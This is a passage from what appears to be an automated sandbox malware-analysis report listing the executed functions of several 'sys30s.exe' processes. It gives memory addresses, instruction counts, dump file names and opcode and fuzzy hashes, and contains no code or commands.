                                    • Instruction ID: 5f2d0102cad6968079127f8f34694ddbc3ee963b1b7dd479fd98378c8ae55e42
                                    • Opcode Fuzzy Hash: 1e8cf1eb3df20e37cff3e469402b719b91b2628618f2b9f048ea620f90109dd4
                                    • Instruction Fuzzy Hash: EC219870D48249CFCB06DFB9E9447ADBBB4EF4B301F0524A9C015AB2A2D7389904CF61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 003A0448, Relevance: .0, Instructions: 11COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000010.00000002.683472284.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 58c19c13a2064c6dd556b1d77bdfecffd088c7712e7bf3010310f62ddc215225
                                    • Instruction ID: 233157fd4b0dd3acb0ccc502803411669a3a8a94a86baafe94ef76333c0e37e5
                                    • Opcode Fuzzy Hash: 58c19c13a2064c6dd556b1d77bdfecffd088c7712e7bf3010310f62ddc215225
                                    • Instruction Fuzzy Hash: 8BC09B300556054BC51537D5785D379B35CD707317F451A54A70D125719B7068D0E995
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Analysis Process: sys30s.exe PID: 2520 Parent PID: 3048 sys30s.exeCOMMON

                                    Executed Functions

                                    Function 002E0550, Relevance: .2, Instructions: 161COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.587406639.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 501fe6455550d06b3144aca423526f92d5c07a587347a896ff0a6000e049d18e
                                    • Instruction ID: 19fd84cbff14302ca9de16a2d6f6272496c214a569d45271234ea7983832932d
                                    • Opcode Fuzzy Hash: 501fe6455550d06b3144aca423526f92d5c07a587347a896ff0a6000e049d18e
                                    • Instruction Fuzzy Hash: 4E61F274E01208CFCB54DFB5D9806EDBBB2BF89304F20806AD409AB355DB359A86CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 002E0560, Relevance: .2, Instructions: 154COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.587406639.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 149f4eab75f4e99944ad51f4570113299d80a50e02adb56002aa3a32aed8d6e7
                                    • Instruction ID: 50632b275df37794fd05d89f04fa40b23d22e7b151777fc988ccbc756292449b
                                    • Opcode Fuzzy Hash: 149f4eab75f4e99944ad51f4570113299d80a50e02adb56002aa3a32aed8d6e7
                                    • Instruction Fuzzy Hash: 0861E274E01208CFCB58DFB5D994AEDBBB2BF89304F20806AD409AB354DB74A985CF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 002E00B1, Relevance: .5, Instructions: 468COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.587406639.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8b5da00a1168abdbf8e8a6a08fa443fbb8f62c7e981c94c491323b5f8b3ff2ad
                                    • Instruction ID: d19e07c7f426e174ce8f22f5467cefa3aca3edd1a00e266b68739c2ed21760a2
                                    • Opcode Fuzzy Hash: 8b5da00a1168abdbf8e8a6a08fa443fbb8f62c7e981c94c491323b5f8b3ff2ad
                                    • Instruction Fuzzy Hash: ECE0AE6005E3D20EC713077028683647FB44F03211F0E15DB9088CB4B3D55819A8D362
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 002E0468, Relevance: .1, Instructions: 74COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.587406639.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2b198675cae6fbe23ebda05f6ba18e20f2a4d7e3c83d62a22677d94012a4a38a
                                    • Instruction ID: f8d09834e1c1c2917d50d0b4fc2db9fd5bcbf398936f072a44cec33196d93ee1
                                    • Opcode Fuzzy Hash: 2b198675cae6fbe23ebda05f6ba18e20f2a4d7e3c83d62a22677d94012a4a38a
                                    • Instruction Fuzzy Hash: 1221FD70C592898FCB01DFB6E8847FDBBB0AF4A300F442079C001A72A1DBB44959CF61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 002E07A8, Relevance: .0, Instructions: 46COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.587406639.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8aac3b67ff37c7b113057f4822b9c88b7e48899e0e3beea812a093d28facb16c
                                    • Instruction ID: 063831d6cbdd2cb64c91c0976e6f65ca86f8c794cc29912633057fd1c1f07433
                                    • Opcode Fuzzy Hash: 8aac3b67ff37c7b113057f4822b9c88b7e48899e0e3beea812a093d28facb16c
                                    • Instruction Fuzzy Hash: CB01CC30C0928A8FCB05DFB9C8801AEBBB1EF86304F0184AEC004EB2A1DB341A49CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 002E0448, Relevance: .0, Instructions: 11COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.587406639.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3e61f39de5a17d69fef008f8885440564b0ba5ca5844fdd09c91dda56c3f094f
                                    • Instruction ID: f0c25d64c56e96240e84d27bf11e98dfc74446c23252088f127cdb6856a2fb46
                                    • Opcode Fuzzy Hash: 3e61f39de5a17d69fef008f8885440564b0ba5ca5844fdd09c91dda56c3f094f
                                    • Instruction Fuzzy Hash: 85C02B300486064BC1002B80784C33CB25C8302317F482800720C02C708B6044D0C395
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Analysis Process: sys30s.exe PID: 2548 Parent PID: 2520 sys30s.exeCOMMON

                                    Executed Functions

                                    Function 001E0550, Relevance: .2, Instructions: 161COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.683109322.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3a1ab1cbe2440944f1547f3720c3519f00cf432036c3895c11d548721f183003
                                    • Instruction ID: 9cfcb2158fcae9f53cec0fef7ae28d4f0964890a2c32871c68b70b85bff6de46
                                    • Opcode Fuzzy Hash: 3a1ab1cbe2440944f1547f3720c3519f00cf432036c3895c11d548721f183003
                                    • Instruction Fuzzy Hash: 8261E474D01208CFCB54DFB5D9906EDBBB2BF89304F20806AD409AB351DB35AA85CF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001E0560, Relevance: .2, Instructions: 154COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.683109322.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b75cdb0c55bccde8f3414b71f7f61f083a6b39f321b02b6cfd41d0def0d1f23d
                                    • Instruction ID: ad7a9334f56b7cccce30eadda632c535492ca27cb43e5165acd1b0fea741d19d
                                    • Opcode Fuzzy Hash: b75cdb0c55bccde8f3414b71f7f61f083a6b39f321b02b6cfd41d0def0d1f23d
                                    • Instruction Fuzzy Hash: 0F61C274E01208CFCB58DFB5D990AEDBBB2BF89304F208169D409AB354DB75AA85CF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001E00B1, Relevance: .5, Instructions: 468COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.683109322.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8166c82808c39602fc8a1140b74bc3d10baeeb217f42e385c457b8c2ac12a820
                                    • Instruction ID: 1a41317685c6dd87b0efd72c86d92fa45e7570f963b00a6d13259e18010d1aca
                                    • Opcode Fuzzy Hash: 8166c82808c39602fc8a1140b74bc3d10baeeb217f42e385c457b8c2ac12a820
                                    • Instruction Fuzzy Hash: 7FE0AE6004E7D10EC713077028683647FB44F03211F0E15DBD088CB8B3D6581998D362
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001E0468, Relevance: .1, Instructions: 75COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.683109322.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a83afb213a3ec07308a6a178906c20efa518f8c41423fd39d818c797abf6ce5f
                                    • Instruction ID: 6c569d346cc405c5c94837ebad9ea2c707b16dd6ccc181ef51551b8ed35c0125
                                    • Opcode Fuzzy Hash: a83afb213a3ec07308a6a178906c20efa518f8c41423fd39d818c797abf6ce5f
                                    • Instruction Fuzzy Hash: DC21D070C097848FCB06DFB5D8047FDBBB0AF4A301F1620AAC005A72A2DB784948CF61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001E0448, Relevance: .0, Instructions: 11COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.683109322.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 58f7c8ecd73c235aaaa9f654de5117e396c3261b0fdcc9b7d3a948c5e58956ef
                                    • Instruction ID: da09c683f28f5638d05b3dca9bbed339f5cab44fcbcfbc6fcad9b23e40ed4b04
                                    • Opcode Fuzzy Hash: 58f7c8ecd73c235aaaa9f654de5117e396c3261b0fdcc9b7d3a948c5e58956ef
                                    • Instruction Fuzzy Hash: 1FC02230008A0A8BC2002B80B80C33CB2AC830232BF082800B20C02CB08BA088C0C3AA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Analysis Process: sys30s.exe PID: 1996 Parent PID: 3048 sys30s.exeCOMMON

                                    Executed Functions

                                    Function 001D0550, Relevance: .2, Instructions: 161COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.598992742.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d06d997fb3cc148739247b890912f615cfcd868e373636e38753d9de6de493b3
                                    • Instruction ID: 8097b6fb1814f0c704b5d796a6fa210fcdb4c89cce8da1831e43f7559d91869b
                                    • Opcode Fuzzy Hash: d06d997fb3cc148739247b890912f615cfcd868e373636e38753d9de6de493b3
                                    • Instruction Fuzzy Hash: 0561E274D01208CFCB54DFB5D990ADDBBB2BF89304F20856AD409AB350DB74A985CF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001D0560, Relevance: .2, Instructions: 154COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.598992742.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0364c0925c0d136d1692603cba49259e4812a44b0fcc2afb5876c5045bdf9071
                                    • Instruction ID: e93941b406573fa41236fa27ad530f86776076b24a9e1c181aa212dd153d3ae6
                                    • Opcode Fuzzy Hash: 0364c0925c0d136d1692603cba49259e4812a44b0fcc2afb5876c5045bdf9071
                                    • Instruction Fuzzy Hash: A761E174E01208CFCB58DFB5D990AEDBBB2BF89304F20806AD409AB354DB74A985CF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001D00B1, Relevance: .5, Instructions: 468COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.598992742.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a7ba767b51b402b03a0bc3e27aae14e0da1aa2862d4503b5044474b1fca4cfa9
                                    • Instruction ID: 63e6d942e533b923b62de35862d725a519d4280edb1dd506e69473dc232a4f0f
                                    • Opcode Fuzzy Hash: a7ba767b51b402b03a0bc3e27aae14e0da1aa2862d4503b5044474b1fca4cfa9
                                    • Instruction Fuzzy Hash: 98F0C26000E3D14FC71347649CA87647FB49F07212F0E09E7D488CB9B3D2686858D362
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001D0468, Relevance: .1, Instructions: 75COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.598992742.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d42619c956bb3c617f3911147150eae23d89dd2803b5eebd6170a753eeff70ae
                                    • Instruction ID: 3e285c477dba1f90adc7158a8527ebd5c39ecd32f296df8af668dfff8f0ed54e
                                    • Opcode Fuzzy Hash: d42619c956bb3c617f3911147150eae23d89dd2803b5eebd6170a753eeff70ae
                                    • Instruction Fuzzy Hash: 8D21A970D08254CFCB06DFA4E844BEDBBB4AF4A301F15247AC015AB3A1D7389904CF61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001D07A8, Relevance: .0, Instructions: 46COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.598992742.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 437332f47fc19a7bbe43118a4333c3e5056394ff4276f626530dad1403dac827
                                    • Instruction ID: 51e3e9549e05b2c030ec12bccba9d3c6f85f8b70d4abfb6001f0617ca86effb3
                                    • Opcode Fuzzy Hash: 437332f47fc19a7bbe43118a4333c3e5056394ff4276f626530dad1403dac827
                                    • Instruction Fuzzy Hash: C4118C30D0524ADFCB45DFB8C8906AEBBB1EF86304F0088AAC115AB3A0DB346A45CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001D0448, Relevance: .0, Instructions: 11COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.598992742.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e17a057e8a1b759bf3995324a5ff6d9832443e4f9f4765ca4d504c5ed392c8ac
                                    • Instruction ID: 9762625e0ff19ced5c3998a71d33df3f11662a12beec5cdeda72edb0579bd2f0
                                    • Opcode Fuzzy Hash: e17a057e8a1b759bf3995324a5ff6d9832443e4f9f4765ca4d504c5ed392c8ac
                                    • Instruction Fuzzy Hash: FBC022300002088BC2002B80B80C33AB3AC830232BF082800BA0C22E30CBE0A8C0C0AA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Analysis Process: sys30s.exe PID: 408 Parent PID: 1996 sys30s.exeCOMMON

                                    Executed Functions

                                    Function 00690550, Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.683894486.0000000000690000.00000040.00000001.sdmp, Offset: 00690000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: |D'
                                    • API String ID: 0-2478143308
                                    • Opcode ID: eb0ae92be0e46f146494df6d35e747cb10d4fff1c35c5ee4cdd3bc288c32ef7f
                                    • Instruction ID: 8f40ce58ec5676c072700824ec8dc2f4daaddddfc0f15431516abce89a048658
                                    • Opcode Fuzzy Hash: eb0ae92be0e46f146494df6d35e747cb10d4fff1c35c5ee4cdd3bc288c32ef7f
                                    • Instruction Fuzzy Hash: 1561E274E01208CFCB54DFB5D991AEDBBB2BF89304F20816AD409AB351DB349986CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00690560, Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.683894486.0000000000690000.00000040.00000001.sdmp, Offset: 00690000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: |D'
                                    • API String ID: 0-2478143308
                                    • Opcode ID: 8941d68e72602eae39aa7dd1966cf0ac99c52464da99019eb33594ccc2e3ea0e
                                    • Instruction ID: 4b76630b1f37528d69fd8c79b448a28b00c0835f327440b096286c90cce9ab7f
                                    • Opcode Fuzzy Hash: 8941d68e72602eae39aa7dd1966cf0ac99c52464da99019eb33594ccc2e3ea0e
                                    • Instruction Fuzzy Hash: E661C274E01208CFCB58DFB5D994ADDBBB2BF89304F208169D409AB354DB35A985CF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006900B1, Relevance: .5, Instructions: 467COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.683894486.0000000000690000.00000040.00000001.sdmp, Offset: 00690000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1476dd20013392ddbf2b5429d8bb62d80e3d974c93e34ba6eacce2a64b9af4b9
                                    • Instruction ID: 954ab477098b71c06eb56f7f6cc2e84247d227e02dded8b0296a0756f9e49f98
                                    • Opcode Fuzzy Hash: 1476dd20013392ddbf2b5429d8bb62d80e3d974c93e34ba6eacce2a64b9af4b9
                                    • Instruction Fuzzy Hash: 09E0C22044E3D24EC71317701C796A47FB40B03205F0E45EBD489CB8A3C61808A9C723
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00690468, Relevance: .1, Instructions: 67COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.683894486.0000000000690000.00000040.00000001.sdmp, Offset: 00690000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cad4eece38c334292b0a3991840d1db16708f4d9fd66443b68408b60dbcc88dd
                                    • Instruction ID: d1b6412e652951715c1e907b934fe6b5a4eae19d2b1f7c4ab2b31c27eb0ba76a
                                    • Opcode Fuzzy Hash: cad4eece38c334292b0a3991840d1db16708f4d9fd66443b68408b60dbcc88dd
                                    • Instruction Fuzzy Hash: 87118970C09245CFDF00EFA4E9597FDBBB9AB4A301F102079C01AA76A1DB784949CF55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00690448, Relevance: .0, Instructions: 11COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.683894486.0000000000690000.00000040.00000001.sdmp, Offset: 00690000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7bc4e2755ca1b821563cf5282edb233f02bd60edc2419de29445ab5be0558f48
                                    • Instruction ID: 1360696a975e6be92cee16e76780e81583cce19dd8ec2a438e57e38198bd76bb
                                    • Opcode Fuzzy Hash: 7bc4e2755ca1b821563cf5282edb233f02bd60edc2419de29445ab5be0558f48
                                    • Instruction Fuzzy Hash: DEC09B340457058ED9143794785D379B2DC9702717F451954660D52D719B6054E0D596
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Analysis Process: sys30s.exe PID: 1856 Parent PID: 3048 sys30s.exeCOMMON

                                    Executed Functions

                                    Function 00450550, Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.611836558.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: |D(
                                    • API String ID: 0-51014365
                                    • Opcode ID: d7d5d78c3f75214f983998fe2a59edcea2c3711353f176c10ad5dd454d552407
                                    • Instruction ID: 325881d3fa256fe891cf7e3c8ce39ec85a7bba2d77726d8b796aa054552b04d2
                                    • Opcode Fuzzy Hash: d7d5d78c3f75214f983998fe2a59edcea2c3711353f176c10ad5dd454d552407
                                    • Instruction Fuzzy Hash: 7161E474D01208CFCB58DFB5D994AEDBBB2BF89304F20846AD409AB355DB34A985CF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00450560, Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.611836558.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: |D(
                                    • API String ID: 0-51014365
                                    • Opcode ID: 32491eddda87d91ceae7af2f50a80ded3771f4d2e2945ce2e3683034915c8a13
                                    • Instruction ID: ecfa60aea26206d769befcf65783ea644732f464de1aadd972ea5476e81cc547
                                    • Opcode Fuzzy Hash: 32491eddda87d91ceae7af2f50a80ded3771f4d2e2945ce2e3683034915c8a13
                                    • Instruction Fuzzy Hash: 1A61E174E01208CFCB58DFB5D990AEDBBB2BF89304F20846AD409AB355DB34A985CF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004500B1, Relevance: .5, Instructions: 468COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.611836558.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4997fe0790b419bc0aea4fd33523f2574f1f47db467a7cf7f84eb92b3e133a47
                                    • Instruction ID: 6c102bb13e0e1af2faa86068933e8c7606f0e784c06997c535d0fd6fbf8fa035
                                    • Opcode Fuzzy Hash: 4997fe0790b419bc0aea4fd33523f2574f1f47db467a7cf7f84eb92b3e133a47
                                    • Instruction Fuzzy Hash: 7BE0CA2440E3C20FC71317702CA83247FB84F03212F0E05EBD488CB8B3E66858A8D366
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00450468, Relevance: .1, Instructions: 74COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.611836558.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4c22c84b71f4df31cfe5151db80a3a237fb678eb5c79299f115c4340f7486c3d
                                    • Instruction ID: d79157534606e7c397f09d959d0e003ec407be1c6d766a58e26d759ae85d3c9f
                                    • Opcode Fuzzy Hash: 4c22c84b71f4df31cfe5151db80a3a237fb678eb5c79299f115c4340f7486c3d
                                    • Instruction Fuzzy Hash: 7E219F74C092488FCB05DFB5E8087FDBBB4AF4B302F14646AC415A72A2EB384909CF65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004507A8, Relevance: .0, Instructions: 46COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.611836558.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eb8ecac767fd3d0eb9a8ca7e4edaeaedea19a0eb8cd63fe033c62649797bcf26
                                    • Instruction ID: 4d3dbd0fa209f32e26a20f6d57e8a964be5f03a2033806948883622051d21e16
                                    • Opcode Fuzzy Hash: eb8ecac767fd3d0eb9a8ca7e4edaeaedea19a0eb8cd63fe033c62649797bcf26
                                    • Instruction Fuzzy Hash: 45018034D0928A9FCB45DFB5C8541AEBBB1EF86304F1184AEC115E72A1DB341A45CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00450448, Relevance: .0, Instructions: 11COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.611836558.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 585f12fa49ba0d2aa35db76992b0d4761518154a89523ddd467c159c4bca3e05
                                    • Instruction ID: 0bc23cefc7705a21361e804869accc62ec8418b44bc0e2422924cd10e2461bb7
                                    • Opcode Fuzzy Hash: 585f12fa49ba0d2aa35db76992b0d4761518154a89523ddd467c159c4bca3e05
                                    • Instruction Fuzzy Hash: E8C09B3804A6054BC5143794785D37DB25C9703317F4929556A0D12571976494D4DB99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Analysis Process: sys30s.exe PID: 1228 Parent PID: 1856 sys30s.exeCOMMON

                                    Executed Functions

                                    Function 00250550, Relevance: .2, Instructions: 159COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.683264141.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dc1111445f96a12cde65a4c0781f556b3e418b813f02b467619befae65587fdc
                                    • Instruction ID: 6e349d60aee30fc04f3b4bfec2c7a19a6b4bd7bfc70dc4d9bdb8a4917979487f
                                    • Opcode Fuzzy Hash: dc1111445f96a12cde65a4c0781f556b3e418b813f02b467619befae65587fdc
                                    • Instruction Fuzzy Hash: F261E074E01208CFCB58DFB5D990AEDBBB2BF89304F20816AD409AB751DB359985CF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00250560, Relevance: .2, Instructions: 154COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.683264141.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 526a160c307211f788d206e4116a9347922a4646cb9d22692a93751c47ede62b
                                    • Instruction ID: 04a90477e91812a93fe278e96d4e7d6ea59e44bf726884b91b8a7618190b4f85
                                    • Opcode Fuzzy Hash: 526a160c307211f788d206e4116a9347922a4646cb9d22692a93751c47ede62b
                                    • Instruction Fuzzy Hash: 5B61CF74E01208CFCB58DFB5D990AEDBBB2BF89304F20816AD409AB354DB75A985CF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 002500B1, Relevance: .5, Instructions: 467COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.683264141.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1a9225fcbba54e666117d5aecd79d8586ad8d439f13dc314f082c7c4a406a3eb
                                    • Instruction ID: 2468a83b594dc2b2bd7ae485054b662e371376c45fca84063ef4e1c85355fe6b
                                    • Opcode Fuzzy Hash: 1a9225fcbba54e666117d5aecd79d8586ad8d439f13dc314f082c7c4a406a3eb
                                    • Instruction Fuzzy Hash: 85E0E52104E3D24FC71347702C782A8BF744F03215F0E16EBD089CB8B3C15809A8D726
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00250468, Relevance: .1, Instructions: 67COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.683264141.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eac4df54c788e349f6d2ec490d2d7fd97e346df41f1efaf86b32fd828d4f74b4
                                    • Instruction ID: bc3a613d884825a677226f6d94a18c3b13c20324af780097dad0961c3c45f338
                                    • Opcode Fuzzy Hash: eac4df54c788e349f6d2ec490d2d7fd97e346df41f1efaf86b32fd828d4f74b4
                                    • Instruction Fuzzy Hash: B6219D70C18245CFCB04DFA4D8947FEBBB4AB4A301F002079D405B72A1EB798958CF59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00250448, Relevance: .0, Instructions: 11COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000016.00000002.683264141.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2332980a5f0d9a5d820c3530ade5dc5675c3430c46ff00baf2e58d9f5f44eac0
                                    • Instruction ID: 06b2c72554eec00857140663e89c6f205fd7a13554ca7c1dbc51daa9ee45aa2f
                                    • Opcode Fuzzy Hash: 2332980a5f0d9a5d820c3530ade5dc5675c3430c46ff00baf2e58d9f5f44eac0
                                    • Instruction Fuzzy Hash: CEC02B300042054BC2043B807C4C33DB25C8302317F041820760C02C30873048D0C499
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Analysis Process: sys30s.exe PID: 2700 Parent PID: 3048 sys30s.exeCOMMON

                                    Executed Functions

                                    Function 003F0550, Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000017.00000002.628618175.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: |D(
                                    • API String ID: 0-51014365
